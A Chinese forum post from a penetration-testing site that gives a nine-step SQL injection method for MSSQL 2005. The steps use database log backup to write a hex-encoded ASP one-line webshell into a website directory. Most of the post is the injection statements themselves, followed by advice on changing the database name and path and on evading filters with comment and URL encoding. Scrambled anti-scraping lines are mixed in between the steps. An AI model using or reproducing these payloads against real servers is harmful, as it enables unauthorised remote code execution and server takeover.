中国网络渗透测试联盟
标题:
mssql2005 DB权限导出一句话
[打印本页]
作者:
admin
时间:
2013-7-16 20:32
标题:
mssql2005 DB权限导出一句话
网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。
- s0 V$ w$ r) m5 T$ d5 m( i
; i$ L+ ?3 L% d4 Z0 Q! r5 I- D) Z
6 J$ E* B: H- e; ?) g h, g
后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具体的利用语句,但贴出来的文章貌似没啥水准,大家都知道手工差异备份是自己需要修改数据库名和网站路径的,但那个文章中对语句没有做任何解释,无奈之下我只好自己尝试了,虽然测试的网站没有成功拿下shell,单语句是没有错误的,我在本地的MSSQL2005的查询分析器中测试通过了,再次特将语句整理出来分享个大家,并做好详细的解释说明,首先来贴出语句。
# Q/ O2 v) M( g/ M g
. L& _+ o' W6 m; h
第一步
: v1 D" w% G9 `) I( w
;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full--
L+ g: [- y {6 V
) v; z: |0 o* v# S
第二步:
: f# n3 I& b& D8 Z- s" v7 k
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
4 ?7 T3 ^6 g# y9 \+ e
# K4 J0 I5 Y' R7 R
第三步
. g. ?% Q- z2 E. P3 Q. U. R8 z
;drop/**/table/**/[itpro]--
; s1 @% X7 H4 K$ Z3 ~2 A) J
1 I" z/ N- @6 a
第四步
% \/ t; z7 H3 k) ^
;create/**/table/**/[itpro]([a]/**/image)--
! L1 F+ d4 y4 Z# G, e3 T
+ y; m% {4 X. y% q) y
第五步
+ k7 h& {3 y5 ~0 l
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
; O4 z+ [/ o! g& S
4 J O# M! A% L0 H8 r& D4 D
第六步
8 f1 Z" p# u" N( |
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--
7 C+ e, Q1 Q# D: _7 U
9 C- I6 J+ M G7 H6 n8 W7 G; I1 [
第七步
4 M4 T2 x. T. C; S, p
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
/ ]- v+ \) L$ r! o% h# I9 n6 D+ j
% y% l' {2 u; _. L& |( L
第八步
: H) y" S. C# I
;drop/**/table/**/[itpro]--
7 g3 H2 A) b( [/ S
& d: o6 o5 r; O6 o
第九步
& ? [6 [8 [( Z8 t
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
% L9 }) L0 ?6 i
" u5 s6 X6 Y9 k: X# {$ l0 W9 ?- ]
其中红色的“Hospital”既是数据库名,这个要根据自己的情况来修改,然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。
. A* `$ l* f- A/ }& y3 L/ J
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2